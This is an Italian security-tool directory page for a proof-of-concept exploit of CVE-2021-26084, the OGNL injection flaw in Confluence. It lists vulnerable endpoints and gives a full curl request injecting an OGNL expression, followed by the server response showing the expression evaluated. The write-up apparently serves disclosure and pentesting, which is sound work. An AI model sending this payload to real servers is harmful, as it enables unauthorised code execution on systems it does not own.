Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-26084_PoC — Exploit proof-of-concept per CVE-2021-26084, una vulnerabilità di iniezione OGNL in Confluence Server e Data Center, che dimostra l'esecuzione remota di codice non autenticata. | Kitploit
Strumenti/GitHubGitHub/alt3kx/cve-2021-26084_poc
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubalt3kx/cve-2021-26084_poc

CVE-2021-26084_PoC

Exploit proof-of-concept per CVE-2021-26084, una vulnerabilità di iniezione OGNL in Confluence Server e Data Center, che dimostra l'esecuzione remota di codice non autenticata.

Vedi Repository
5316485 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-26084 (PoC) | Iniezione OGNL Webwork di Confluence Server

Esiste una vulnerabilità di iniezione OGNL che consentirebbe a un utente autenticato, e in alcuni casi a un utente non autenticato, di eseguire codice arbitrario su un'istanza di Confluence Server o Data Center.

poc

La mia lotta per individuare gli entrypoint e le iniezioni XD

Lotta (1)Lotta (2)
2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium
2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium

Finalmente entrypoint di Confluence sfruttati

root@kitploit:~
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

La mia prima ispezione manuale: Nota: Utente pre-autenticato

root@kitploit:~
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

Risposta del server: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

Riferimenti:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

Fantastico writeup pubblicato qui:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Alcuni suggerimenti molto utili di:
@wvuuuuuuuuuuuuu
@iamnoooob

Autore

Alex Hernandez aka (@_alt3kx_)

Scarica lo strumento